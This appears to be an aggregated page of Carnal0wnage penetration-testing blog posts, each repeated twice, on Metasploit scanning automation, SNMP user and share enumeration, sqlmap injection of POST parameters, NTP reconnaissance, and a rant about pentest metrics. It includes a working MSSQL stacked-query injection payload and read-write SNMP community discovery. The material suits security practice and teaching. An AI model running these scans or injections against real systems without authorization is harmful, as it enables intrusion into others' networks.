SSL => TRUE
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
RHOSTS => 192.168.1.106
RPORT => 443
SSL => TRUE
[*] 192.168.1.106 nginx/0.6.32 ( 302-http://192.168.1.106/ )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
RHOSTS => 192.168.1.107
RPORT => 443
SSL => TRUE
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
RHOSTS => 192.168.1.135
RPORT => 443
SSL => TRUE
[*] 192.168.1.135 Apache/2.2.11 (Ubuntu) mod_ssl/2.2.11 OpenSSL/0.9.8g Phusion_Passenger/2.2.15 ( Powered by Phusion Passenger (mod_rails/mod_rack) 2.2.15 )
[*] Auxiliary module execution completed
RHOSTS => 192.168.1.168
RPORT => 443
SSL => TRUE
[*] 192.168.1.168 Apache/2.2.8 (Ubuntu) mod_python/3.3.1 Python/2.5.2 PHP/5.2.4-2ubuntu5.3 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_wsgi/1.3
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
RHOSTS => 192.168.1.229
RPORT => 443
SSL => TRUE
[*] 192.168.1.229 Apache/2.2.9 (Debian) DAV/2 SVN/1.4.2 PHP/5.3.2-0.dotdeb.1 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.2 Perl/v5.8.8 ( Powered by PHP/5.3.2-0.dotdeb.1 )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Running Auxiliary Module auxiliary/scanner/http/options
RHOSTS => 192.168.1.10
RPORT => 443
SSL => TRUE
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
RHOSTS => 192.168.1.100
RPORT => 443
SSL => TRUE
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
...SNIP...YOU GET THE IDEA...

-CG

thanks to hdm and jcran

Tags:

6:15

Running Auxiliary Modules Against Multiple Hosts the Smart Way Part 2

» ‎ Carnal0wnage

msf auxiliary(options) > resource
Usage: resource path1 path2 ...

Run the commands stored in the supplied files.

In this case i want to run two modules against every port that has 80 open. Here's some code to do it:


set THREADS 10

[ruby] **#replace [ and ] with their respective ""**'

#start with an array to hold our modules we want to run
modules = [
"auxiliary/scanner/http/http_version",
"auxiliary/scanner/http/options",]

#another array for our hosts
hosts = []
framework.db.services.each do |service| 
 if service.port == 443 
  hosts  end
end

#loop through each module in the list
modules.each do |blah|
 self.run_single("use #{blah}")
  puts ("\nRunning Auxiliary Module #{blah}")
                #for each host with 443 open, set appropriate configs and run the module against it
  hosts.each do |rhost|
          self.run_single("set RHOSTS #{rhost}")
   self.run_single("set RPORT 443") #change to the port above
   self.run_single("set SSL TRUE")
          self.run_single("run")
  end 
end
[/ruby] **#replace [ and ] with their respective ""**

Running it:


msf auxiliary(options) > resource /home/user/.msf3/aux_do_dbhosts.rc 
resource (/home/user/.msf3/aux_do_dbhosts.rc)> set THREADS 10
THREADS => 10
[*] resource (/home/user/.msf3/aux_do_dbhosts.rc)> Ruby Code (962 bytes)

Running Auxiliary Module auxiliary/scanner/http/http_version
RHOSTS => 192.168.1.10
RPORT => 443
SSL => TRUE
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
RHOSTS => 192.168.1.106
RPORT => 443
SSL => TRUE
[*] 192.168.1.106 nginx/0.6.32 ( 302-http://192.168.1.106/ )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
RHOSTS => 192.168.1.107
RPORT => 443
SSL => TRUE
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
RHOSTS => 192.168.1.135
RPORT => 443
SSL => TRUE
[*] 192.168.1.135 Apache/2.2.11 (Ubuntu) mod_ssl/2.2.11 OpenSSL/0.9.8g Phusion_Passenger/2.2.15 ( Powered by Phusion Passenger (mod_rails/mod_rack) 2.2.15 )
[*] Auxiliary module execution completed
RHOSTS => 192.168.1.168
RPORT => 443
SSL => TRUE
[*] 192.168.1.168 Apache/2.2.8 (Ubuntu) mod_python/3.3.1 Python/2.5.2 PHP/5.2.4-2ubuntu5.3 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_wsgi/1.3
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
RHOSTS => 192.168.1.229
RPORT => 443
SSL => TRUE
[*] 192.168.1.229 Apache/2.2.9 (Debian) DAV/2 SVN/1.4.2 PHP/5.3.2-0.dotdeb.1 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.2 Perl/v5.8.8 ( Powered by PHP/5.3.2-0.dotdeb.1 )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Running Auxiliary Module auxiliary/scanner/http/options
RHOSTS => 192.168.1.10
RPORT => 443
SSL => TRUE
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
RHOSTS => 192.168.1.100
RPORT => 443
SSL => TRUE
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
...SNIP...YOU GET THE IDEA...

-CG

thanks to hdm and jcran

Tags: auxiliary ssl module smart-way ruby auxiliary-modules db-service phusion automation

April 26, 2011
9:52
Running Auxiliary Modules Against Multiple Hosts the Smart Way
» ‎ carnal0wnage.attackresearch.com

So a coulple of cool updates lately to metasploit framework. If you check out db_services you'll see a super handy feature of "-R"

msf auxiliary(http_version) > db_services -h

Usage: db_services [-h|--help] [-u|--up] [-a ] [-r ] [-p ] [-n ] [-o ]

-a Search for a list of addresses
-c Only show the given columns
-h,--help Show this help information
-n Search for a list of service names
-p Search for a list of ports
-->
read more

Tags:
April 25, 2011

Permalink for 'Running Auxiliary Modules Against Multiple Hosts the Smart Way'

12:42

Running Auxiliary Modules Against Multiple Hosts the Smart Way

» ‎ carnal0wnage.attackresearch.com

So a coulple of cool updates lately to metasploit framework. If you check out db_services you'll see a super handy feature of "-R"


msf auxiliary(http_version) > db_services -h

Usage: db_services [-h|--help] [-u|--up] [-a ] [-r ] [-p ] [-n ] [-o ]

 -a   Search for a list of addresses
 -c     Only show the given columns
 -h,--help         Show this help information
 -n   Search for a list of service names
 -p   Search for a list of ports
 -r      Only show [tcp|udp] services
 -u,--up           Only show services which are up
 -o          Send output to a file in csv format
 -R,--rhosts       Set RHOSTS from the results of the search

Available columns: created_at, info, name, port, proto, state, updated_at

In the past you could list your hosts by port (db_services -p 80) but I want to be able to USE those hosts and throw modules at them, bring in the -R option

msf auxiliary(http_version) > use auxiliary/scanner/http/options
msf auxiliary(options) > db_services -R -p 80

Services
========

host           port  proto  name  state  info
----           ----  -----  ----  -----  ----
192.168.1.245  80    tcp    http  open   Apache/2.2.3 (CentOS) ( Powered by PHP/5.1.6 )
192.168.1.246  80    tcp    http  open   Apache/2.2.3 (CentOS)
192.168.1.247  80    tcp    http  open   Apache/2.2.12 (Ubuntu)
192.168.1.248  80    tcp    http  open   lighttpd/1.5.0
192.168.1.249  80    tcp    http  open   Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.4 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g Phusion_Passenger/2.2.11
192.168.1.251  80    tcp    http  open   Apache
192.168.1.254  80    tcp    http  open   Apache/2.2.3 (CentOS)

RHOSTS => file:/tmp/msf-db-rhosts-20110423-27121-10wiuni-0

msf auxiliary(options) > run

[*] Scanned 1 of 7 hosts (014% complete)
[*] Scanned 2 of 7 hosts (028% complete)
[*] 192.168.1.247 allows GET,HEAD,POST,OPTIONS methods
[*] Scanned 3 of 7 hosts (042% complete)
[*]192.168.1.248 allows OPTIONS, GET, HEAD, POST methods
[*] Scanned 4 of 7 hosts (057% complete)
[*] 192.168.1.249 allows GET,HEAD,POST,OPTIONS,TRACE methods
[*] Scanned 5 of 7 hosts (071% complete)
[*] Scanned 6 of 7 hosts (085% complete)
[*] Scanned 7 of 7 hosts (100% complete)
[*] Auxiliary module execution completed

-CG

Tags:

12:42

Running Auxiliary Modules Against Multiple Hosts the Smart Way

» ‎ Carnal0wnage

So a coulple of cool updates lately to metasploit framework. If you check out db_services you'll see a super handy feature of "-R"


msf auxiliary(http_version) > db_services -h

Usage: db_services [-h|--help] [-u|--up] [-a ] [-r ] [-p ] [-n ] [-o ]

 -a   Search for a list of addresses
 -c     Only show the given columns
 -h,--help         Show this help information
 -n   Search for a list of service names
 -p   Search for a list of ports
 -r      Only show [tcp|udp] services
 -u,--up           Only show services which are up
 -o          Send output to a file in csv format
 -R,--rhosts       Set RHOSTS from the results of the search

Available columns: created_at, info, name, port, proto, state, updated_at

In the past you could list your hosts by port (db_services -p 80) but I want to be able to USE those hosts and throw modules at them, bring in the -R option

msf auxiliary(http_version) > use auxiliary/scanner/http/options
msf auxiliary(options) > db_services -R -p 80

Services
========

host           port  proto  name  state  info
----           ----  -----  ----  -----  ----
192.168.1.245  80    tcp    http  open   Apache/2.2.3 (CentOS) ( Powered by PHP/5.1.6 )
192.168.1.246  80    tcp    http  open   Apache/2.2.3 (CentOS)
192.168.1.247  80    tcp    http  open   Apache/2.2.12 (Ubuntu)
192.168.1.248  80    tcp    http  open   lighttpd/1.5.0
192.168.1.249  80    tcp    http  open   Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.4 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g Phusion_Passenger/2.2.11
192.168.1.251  80    tcp    http  open   Apache
192.168.1.254  80    tcp    http  open   Apache/2.2.3 (CentOS)

RHOSTS => file:/tmp/msf-db-rhosts-20110423-27121-10wiuni-0

msf auxiliary(options) > run

[*] Scanned 1 of 7 hosts (014% complete)
[*] Scanned 2 of 7 hosts (028% complete)
[*] 192.168.1.247 allows GET,HEAD,POST,OPTIONS methods
[*] Scanned 3 of 7 hosts (042% complete)
[*]192.168.1.248 allows OPTIONS, GET, HEAD, POST methods
[*] Scanned 4 of 7 hosts (057% complete)
[*] 192.168.1.249 allows GET,HEAD,POST,OPTIONS,TRACE methods
[*] Scanned 5 of 7 hosts (071% complete)
[*] Scanned 6 of 7 hosts (085% complete)
[*] Scanned 7 of 7 hosts (100% complete)
[*] Auxiliary module execution completed

-CG

Tags: scanned tcp http smart-way udp-services csv-format db-services automation

April 15, 2011
19:41
Data Driven Pentests...Don't You mean Vulnerability Assessments?
» ‎ carnal0wnage.attackresearch.com

So first a disclaimer, i didnt listen to the referenced podcast, this is based solely of this blog post: http://newschoolsecurity.com/2011/04/data-driven-pen-tests

-->
read more

Tags:
19:14
Data Driven Pentests...Don't You mean Vulnerability Assessments?
» ‎ carnal0wnage.attackresearch.com

So first a disclaimer, i didnt listen to the referenced podcast, this is based solely of this blog post:
http://newschoolsecurity.com/2011/04/data-driven-pen-tests
So I’m listening to the “Larry, Larry, Larry” episode of the Risk Hose podcast, and Alex is talking about data-driven pen tests. I want to posit that pen tests are already empirical. Pen testers know what techniques work for them, and start with those techniques.
What we could use are data-driven pen test reports. “We tried X, which works in 78% of attempts, and it failed.”
We could also use more shared data about what tests tend to work.
Thoughts?
Dre's response to the post was surprising to me, he listed a bunch of tools that seem to do correlating of pentest results into a portal so you can trend over time. Cool idea, i'll give the people that. But to me when we start jumping into repeatable metrics driven stuff we are in Vulnerability Assessment land, not pentesting land.
Here is the comment I left:
I like the idea and i think it could be useful.
However, they need to drop the pentest part. you are solidly into the vulnerability assessment part of things when you are talking about “ok, i tried 1,2,3,4,5 and 1 & 3 worked” ok on to the next set of tests… thats vulnerability assessment (with exploitation if you want to get technical) and not pentesting.
pentesting is about that human looking at the problem and figuring out how to break it, not some scanner, thats going to be very hard to standardize and put hard numbers on and i dont think its going to be possible without tying up your tester’s time with bullshit.
I'm all for "repeatable" pentests. You should have a methodology for each type of test, but when you are paying for human's time you should be paying for them to go after the site like a human would and not how a scanner would or not in a way where i'm worried about religiously following some checklist because if i don't the metrics get all fucked up. Your pentest should come after you have thrown the kitchen sink at it scanner wise.
as an added bonus this post was right below the new school post in my Google reader:
http://coding-insecurity.blogspot.com/2011/04/developing-good-methodology-part-3.html
This post and really any methodology document you will ever read or write will have gaps, because no document on this subject can ever really be 100% all inclusive of every vulnerability and the myriad of variations that exist for many of these.

I think it drives the point home as well.
-CG
Tags:

19:14
Data Driven Pentests...Don't You mean Vulnerability Assessments?
» ‎ Carnal0wnage

So first a disclaimer, i didnt listen to the referenced podcast, this is based solely of this blog post:
http://newschoolsecurity.com/2011/04/data-driven-pen-tests
So I’m listening to the “Larry, Larry, Larry” episode of the Risk Hose podcast, and Alex is talking about data-driven pen tests. I want to posit that pen tests are already empirical. Pen testers know what techniques work for them, and start with those techniques.
What we could use are data-driven pen test reports. “We tried X, which works in 78% of attempts, and it failed.”
We could also use more shared data about what tests tend to work.
Thoughts?
Dre's response to the post was surprising to me, he listed a bunch of tools that seem to do correlating of pentest results into a portal so you can trend over time. Cool idea, i'll give the people that. But to me when we start jumping into repeatable metrics driven stuff we are in Vulnerability Assessment land, not pentesting land.
Here is the comment I left:
I like the idea and i think it could be useful.
However, they need to drop the pentest part. you are solidly into the vulnerability assessment part of things when you are talking about “ok, i tried 1,2,3,4,5 and 1 & 3 worked” ok on to the next set of tests… thats vulnerability assessment (with exploitation if you want to get technical) and not pentesting.
pentesting is about that human looking at the problem and figuring out how to break it, not some scanner, thats going to be very hard to standardize and put hard numbers on and i dont think its going to be possible without tying up your tester’s time with bullshit.
I'm all for "repeatable" pentests. You should have a methodology for each type of test, but when you are paying for human's time you should be paying for them to go after the site like a human would and not how a scanner would or not in a way where i'm worried about religiously following some checklist because if i don't the metrics get all fucked up. Your pentest should come after you have thrown the kitchen sink at it scanner wise.
as an added bonus this post was right below the new school post in my Google reader:
http://coding-insecurity.blogspot.com/2011/04/developing-good-methodology-part-3.html
This post and really any methodology document you will ever read or write will have gaps, because no document on this subject can ever really be 100% all inclusive of every vulnerability and the myriad of variations that exist for many of these.

I think it drives the point home as well.
-CG
Tags: vulnerability post pen larry alex don vulnerability-assessments vulnerability-assessment test-reports rant

March 25, 2011
16:32
New SNMP Metasploit Modules
» ‎ carnal0wnage.attackresearch.com

my new favorite modules (for today) are the snmp_enumusers and snmp_enumshares modules that work against windows hosts that have snmp running.

msf > use auxiliary/scanner/snmp/
use auxiliary/scanner/snmp/aix_version
use auxiliary/scanner/snmp/snmp_enumshares
use auxiliary/scanner/snmp/cisco_config_tftp
use auxiliary/scanner/snmp/snmp_enumusers
use auxiliary/scanner/snmp/cisco_upload_file
use auxiliary/scanner/snmp/snmp_login
use auxiliary/scanner/snmp/snmp_enum
use auxiliary/scanner/snmp/snmp_set
-->
read more

Tags:
March 23, 2011
13:27
New SNMP Metasploit Modules
» ‎ carnal0wnage.attackresearch.com

my new favorite modules (for today) are the snmp_enumusers and snmp_enumshares modules that work against windows hosts that have snmp running.

msf > use auxiliary/scanner/snmp/
use auxiliary/scanner/snmp/aix_version
use auxiliary/scanner/snmp/snmp_enumshares
use auxiliary/scanner/snmp/cisco_config_tftp
use auxiliary/scanner/snmp/snmp_enumusers
use auxiliary/scanner/snmp/cisco_upload_file
use auxiliary/scanner/snmp/snmp_login
use auxiliary/scanner/snmp/snmp_enum
use auxiliary/scanner/snmp/snmp_set

msf > use auxiliary/scanner/snmp/snmp_login
msf auxiliary(snmp_login) > set RHOSTS 192.168.100.119
RHOSTS => 192.168.100.119
msf auxiliary(snmp_login) > run

[+] SNMP: 192.168.100.119 community string: 'public' info: 'Hardware: x86 Family 6 Model 23 Stepping 6 AT/AT COMPATIBLE - Software: Windows Version 5.2 (Build 3790 Multiprocessor Free)'
[+] SNMP: 192.168.100.119 community string: 'private' info: 'Hardware: x86 Family 6 Model 23 Stepping 6 AT/AT COMPATIBLE - Software: Windows Version 5.2 (Build 3790 Multiprocessor Free)'
[*] Validating scan results from 1 hosts...
[*] Host 192.168.100.119 provides READ-WRITE access with community 'private'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf auxiliary(snmp_login) > use auxiliary/scanner/snmp/snmp_enumusers
msf auxiliary(snmp_enumusers) > info
...SNIP...
Description:
This module will use LanManager OID values to enumerate local user accounts on a Windows system via SNMP

msf auxiliary(snmp_enumusers) > set RHOSTS 192.168.100.119
RHOSTS => 192.168.100.119
msf auxiliary(snmp_enumusers) > run

[+] 192.168.100.119 Found Users: ASPNET, Administrator, Guest, IUSR_SRV, IWAM_SRV, SUPPORT_388945a0
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf auxiliary(snmp_enumusers) > use auxiliary/scanner/snmp/snmp_enumshares
msf auxiliary(snmp_enumshares) > info
...SNIP...
Description:
This module will use LanManager OID values to enumerate SMB shares on a Windows system via SNMP

msf auxiliary(snmp_enumshares) > set RHOSTS 192.168.100.119
RHOSTS => 192.168.100.119
msf auxiliary(snmp_enumshares) > run

[+] 192.168.100.119
backup - (C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\backup)
MetaInfoBack - (C:\WINDOWS\system32\inetsrv\MetaInfoBack)
NewBackup2 - (J:\NewBackup2)
SharepointBackup - (K:\SharepointBackup)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Tags:

13:27
New SNMP Metasploit Modules
» ‎ Carnal0wnage

my new favorite modules (for today) are the snmp_enumusers and snmp_enumshares modules that work against windows hosts that have snmp running.

msf > use auxiliary/scanner/snmp/
use auxiliary/scanner/snmp/aix_version
use auxiliary/scanner/snmp/snmp_enumshares
use auxiliary/scanner/snmp/cisco_config_tftp
use auxiliary/scanner/snmp/snmp_enumusers
use auxiliary/scanner/snmp/cisco_upload_file
use auxiliary/scanner/snmp/snmp_login
use auxiliary/scanner/snmp/snmp_enum
use auxiliary/scanner/snmp/snmp_set

msf > use auxiliary/scanner/snmp/snmp_login
msf auxiliary(snmp_login) > set RHOSTS 192.168.100.119
RHOSTS => 192.168.100.119
msf auxiliary(snmp_login) > run

[+] SNMP: 192.168.100.119 community string: 'public' info: 'Hardware: x86 Family 6 Model 23 Stepping 6 AT/AT COMPATIBLE - Software: Windows Version 5.2 (Build 3790 Multiprocessor Free)'
[+] SNMP: 192.168.100.119 community string: 'private' info: 'Hardware: x86 Family 6 Model 23 Stepping 6 AT/AT COMPATIBLE - Software: Windows Version 5.2 (Build 3790 Multiprocessor Free)'
[*] Validating scan results from 1 hosts...
[*] Host 192.168.100.119 provides READ-WRITE access with community 'private'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf auxiliary(snmp_login) > use auxiliary/scanner/snmp/snmp_enumusers
msf auxiliary(snmp_enumusers) > info
...SNIP...
Description:
This module will use LanManager OID values to enumerate local user accounts on a Windows system via SNMP

msf auxiliary(snmp_enumusers) > set RHOSTS 192.168.100.119
RHOSTS => 192.168.100.119
msf auxiliary(snmp_enumusers) > run

[+] 192.168.100.119 Found Users: ASPNET, Administrator, Guest, IUSR_SRV, IWAM_SRV, SUPPORT_388945a0
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf auxiliary(snmp_enumusers) > use auxiliary/scanner/snmp/snmp_enumshares
msf auxiliary(snmp_enumshares) > info
...SNIP...
Description:
This module will use LanManager OID values to enumerate SMB shares on a Windows system via SNMP

msf auxiliary(snmp_enumshares) > set RHOSTS 192.168.100.119
RHOSTS => 192.168.100.119
msf auxiliary(snmp_enumshares) > run

[+] 192.168.100.119
backup - (C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\backup)
MetaInfoBack - (C:\WINDOWS\system32\inetsrv\MetaInfoBack)
NewBackup2 - (J:\NewBackup2)
SharepointBackup - (K:\SharepointBackup)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Tags: scanner rhosts snmp read cisco-config info-hardware smb-shares

March 21, 2011
5:29
sqlmap with POST requests
» ‎ carnal0wnage.attackresearch.com

Notes for sqlmap and POST requests since every f**king tutorial only covers GETs

options you'll want to use

-u URL, --url=URL
--method=METHOD
--data=DATA
-p TESTPARAMETER
--prefix=PREFIX
--postfix=POSTFIX
--dbms=DBMS

*--dbms= if sqlmap is sucking

we'll assume we have a simple post request

user@ubuntu:~/pentest/sqlmap-dev$ python sqlmap.py -u "http://192.168.1.100/fancyshmancy/login.aspx" --method POST --data "usernameTxt=blah&passwordTxt=blah&submitBtn=Log+On" -p "usernameTxt" --prefix="')" --dbms=mssql -v 2

--method to pass the POST option

--data to pass the paramaters that are required for the POST

-p to pass the injectable field, so in this case the username field (usernameTxt)

--prefix to pass what needs to be passed before we can inject. we had to issue a tick ( ' ) and right parenthesis ( ) ) to close out the query

--dbms to tell it the backend was mssql

this yields us an sqlmap query like so:

Place: POST
Parameter: usernameTxt
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: usernameTxt=blah'); WAITFOR DELAY '0:0:5';-- AND ('yTwo'='yTwo&passwordTxt=blah&submitBtn=Log+On
---
Tags:

5:29
sqlmap with POST requests
» ‎ Carnal0wnage

Notes for sqlmap and POST requests since every f**king tutorial only covers GETs

options you'll want to use

-u URL, --url=URL
--method=METHOD
--data=DATA
-p TESTPARAMETER
--prefix=PREFIX
--postfix=POSTFIX
--dbms=DBMS

*--dbms= if sqlmap is sucking

we'll assume we have a simple post request

user@ubuntu:~/pentest/sqlmap-dev$ python sqlmap.py -u "http://192.168.1.100/fancyshmancy/login.aspx" --method POST --data "usernameTxt=blah&passwordTxt=blah&submitBtn=Log+On" -p "usernameTxt" --prefix="')" --dbms=mssql -v 2

--method to pass the POST option

--data to pass the paramaters that are required for the POST

-p to pass the injectable field, so in this case the username field (usernameTxt)

--prefix to pass what needs to be passed before we can inject. we had to issue a tick ( ' ) and right parenthesis ( ) ) to close out the query

--dbms to tell it the backend was mssql

this yields us an sqlmap query like so:

Place: POST
Parameter: usernameTxt
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: usernameTxt=blah'); WAITFOR DELAY '0:0:5';-- AND ('yTwo'='yTwo&passwordTxt=blah&submitBtn=Log+On
---
Tags: url sqlmap post f-king url-url sql injection

March 18, 2011
7:56
I forgot my NTP stuff, so here's more notes on it
» ‎ carnal0wnage.attackresearch.com

yeah what the title says, for some reason the NTP module wasn't working for me in Metasploit so i had to remember how to use the NTP tools to pull some info.

here are my notes:

http://www.eecis.udel.edu/~mills/ntp/html/ntpdc.html
ntpdc -c sysinfo 192.168.1.205
ntpdc -c monolist 192.168.1.205
ntpdc -c listpeers 192.168.1.205
ntpdc -c peers 192.168.1.205
ntpdc -c reslist 192.168.1.205

http://www.eecis.udel.edu/~mills/ntp/html/ntpq.html
ntpq 192.168.1.205
-> version
-> host
-> readlist
-> lpeers
-> hostnames
-> keytype
-> ntpversion
-> associations
-> pstatus [#]

ntpq> help
ntpq commands:
addvars debug lopeers passociations rl
associations delay lpassociations passwd rmvars
authenticate exit lpeers peers rv
cl help mreadlist poll showvars
clearvars host mreadvar pstatus timeout
clocklist hostnames mrl quit version
clockvar keyid mrv raw writelist
cooked keytype ntpversion readlist writevar
cv lassociations opeers readvar
ntpq>

chris@notbt:/pentest$ ntpq 192.168.1.60
ntpq> lpeers
remote refid st t when poll reach delay offset jitter
==============================================================================
*computerville.wxy.suk 192.168.1.108 2 u 338 1024 377 35.327 -0.702 1.030

ntpq> version
ntpq 4.2.4p8@1.1612-o Fri Apr 9 00:28:48 UTC 2010 (1)

ntpq> host
current host is 192.168.1.60

ntpq> readlist
assID=0 status=0658 leap_none, sync_ntp, 5 events, event_8,
version="ntpd 4.2.6p2@1.2194-o Sun Oct 17 02:04:37 UTC 2010 (1)", processor="x86_64", system="Linux/2.6.35.4-x86_64-linode16", leap=00,strasuk=3, precision=-20, rootdelay=58.612, rootdisp=86.969, refid=1.2.3.102,
reftime=d12a932f.e1697c36 Wed, Mar 16 2011 1:38:55.880,
clock=d12a98c9.eee329a7 Wed, Mar 16 2011 2:02:49.933, peer=18290,
tc=10, mintc=3, offset=-0.702, frequency=-16.787, sys_jitter=1.061, clk_jitter=0.881, clk_wander=0.144

ntpq> hostnames
hostnames being shown

ntpq> keytype
keytype is MD5

ntpq> ntpversion
NTP version being claimed is 2

ntpq> associations

ind assID status conf reach auth condition last_event cnt
===========================================================
1 18290 964a yes yes none sys.peer 4

ntpq> pstatus 18290
assID=18290 status=964a reach, conf, sel_sys.peer, 4 events, event_10,
srcadr=computerville.wxy.suk.de, srcport=123, dstadr=192.168.1.60,
dstport=123, leap=00, strasuk=2, precision=-20, rootdelay=22.964,
rootdisp=33.768, refid=192.168.1.108,reftime=d12a9360.1f34b00f Wed, Mar 16 2011 1:39:44.121,
rec=d12a976a.e177c84f Wed, Mar 16 2011 1:56:58.880, reach=377,
unreach=0, hmode=3, pmode=4, hpoll=10, ppoll=10, headway=0, flash=00 ok,
keyid=0, offset=-0.702, delay=35.327, dispersion=19.528, jitter=1.030,xleave=0.050, filtdelay= 35.56 35.33 35.47 35.69 35.81 35.42 35.38 35.58,
filtoffset= -0.85 -0.70 -0.86 -1.42 -1.63 -1.90 -2.42 -1.97,
filtdisp= 0.00 16.25 32.00 47.93 63.45 79.40 95.69 111.96

chris@notbt:/pentest$ ntpdc -c monlist 192.168.1.60
remote address port local address count m ver code avgint lstint
===============================================================================
computerville.wxy.suk.de 123 192.168.1.60 6832 4 4
90 1044 476

chris@notbt:/pentest$ ntpdc -c sysinfo 192.168.1.60
system peer: computerville.wxy.suk.de
system peer mode: client
leap indicator: 00
strasuk: 3
precision: -20
root distance: 0.05861 s
root dispersion: 0.08899 s
reference ID: [1.2.3.102]
reference time: d12a932f.e1697c36 Wed, Mar 16 2011 1:38:55.880
system flags: auth monitor ntp kernel stats
jitter: 0.001053 s
stability: 0.000 ppm
broadcastdelay: 0.000000 s
authdelay: 0.000000 s

chris@notbt:/pentest$ ntpdc -c listpeers 192.168.1.60
client computerville.wxy.suk.de

chris@notbt:/pentest$ ntpdc -c peers 192.168.1.60
remote local st poll reach delay offset disp
=======================================================================
*computerville.wxy.suk 192.168.1.60 2 1024 377 0.03532 -0.000702 0.13974

chris@notbt:/pentest$ ntpdc -c reslist 192.168.1.60
address mask count flags
=====================================================================
0.0.0.0 0.0.0.0 6846 nomodify, nopeer
some-domain 255.255.255.255 0 none
some-domain 255.255.255.255 0 ignore
osafs.org 255.255.255.255 0 ignore
:: :: 0 nomodify, nopeer
ip6-localhost ffff:ffff:ffff: 0 ignore
fe80::fcfd:b2ff ffff:ffff:ffff: 0 ignore
Tags:

7:56
I forgot my NTP stuff, so here's more notes on it
» ‎ Carnal0wnage

yeah what the title says, for some reason the NTP module wasn't working for me in Metasploit so i had to remember how to use the NTP tools to pull some info.

here are my notes:

http://www.eecis.udel.edu/~mills/ntp/html/ntpdc.html
ntpdc -c sysinfo 192.168.1.205
ntpdc -c monolist 192.168.1.205
ntpdc -c listpeers 192.168.1.205
ntpdc -c peers 192.168.1.205
ntpdc -c reslist 192.168.1.205

http://www.eecis.udel.edu/~mills/ntp/html/ntpq.html
ntpq 192.168.1.205
-> version
-> host
-> readlist
-> lpeers
-> hostnames
-> keytype
-> ntpversion
-> associations
-> pstatus [#]

ntpq> help
ntpq commands:
addvars debug lopeers passociations rl
associations delay lpassociations passwd rmvars
authenticate exit lpeers peers rv
cl help mreadlist poll showvars
clearvars host mreadvar pstatus timeout
clocklist hostnames mrl quit version
clockvar keyid mrv raw writelist
cooked keytype ntpversion readlist writevar
cv lassociations opeers readvar
ntpq>

chris@notbt:/pentest$ ntpq 192.168.1.60
ntpq> lpeers
remote refid st t when poll reach delay offset jitter
==============================================================================
*computerville.wxy.suk 192.168.1.108 2 u 338 1024 377 35.327 -0.702 1.030

ntpq> version
ntpq 4.2.4p8@1.1612-o Fri Apr 9 00:28:48 UTC 2010 (1)

ntpq> host
current host is 192.168.1.60

ntpq> readlist
assID=0 status=0658 leap_none, sync_ntp, 5 events, event_8,
version="ntpd 4.2.6p2@1.2194-o Sun Oct 17 02:04:37 UTC 2010 (1)", processor="x86_64", system="Linux/2.6.35.4-x86_64-linode16", leap=00,strasuk=3, precision=-20, rootdelay=58.612, rootdisp=86.969, refid=1.2.3.102,
reftime=d12a932f.e1697c36 Wed, Mar 16 2011 1:38:55.880,
clock=d12a98c9.eee329a7 Wed, Mar 16 2011 2:02:49.933, peer=18290,
tc=10, mintc=3, offset=-0.702, frequency=-16.787, sys_jitter=1.061, clk_jitter=0.881, clk_wander=0.144

ntpq> hostnames
hostnames being shown

ntpq> keytype
keytype is MD5

ntpq> ntpversion
NTP version being claimed is 2

ntpq> associations

ind assID status conf reach auth condition last_event cnt
===========================================================
1 18290 964a yes yes none sys.peer 4

ntpq> pstatus 18290
assID=18290 status=964a reach, conf, sel_sys.peer, 4 events, event_10,
srcadr=computerville.wxy.suk.de, srcport=123, dstadr=192.168.1.60,
dstport=123, leap=00, strasuk=2, precision=-20, rootdelay=22.964,
rootdisp=33.768, refid=192.168.1.108,reftime=d12a9360.1f34b00f Wed, Mar 16 2011 1:39:44.121,
rec=d12a976a.e177c84f Wed, Mar 16 2011 1:56:58.880, reach=377,
unreach=0, hmode=3, pmode=4, hpoll=10, ppoll=10, headway=0, flash=00 ok,
keyid=0, offset=-0.702, delay=35.327, dispersion=19.528, jitter=1.030,xleave=0.050, filtdelay= 35.56 35.33 35.47 35.69 35.81 35.42 35.38 35.58,
filtoffset= -0.85 -0.70 -0.86 -1.42 -1.63 -1.90 -2.42 -1.97,
filtdisp= 0.00 16.25 32.00 47.93 63.45 79.40 95.69 111.96

chris@notbt:/pentest$ ntpdc -c monlist 192.168.1.60
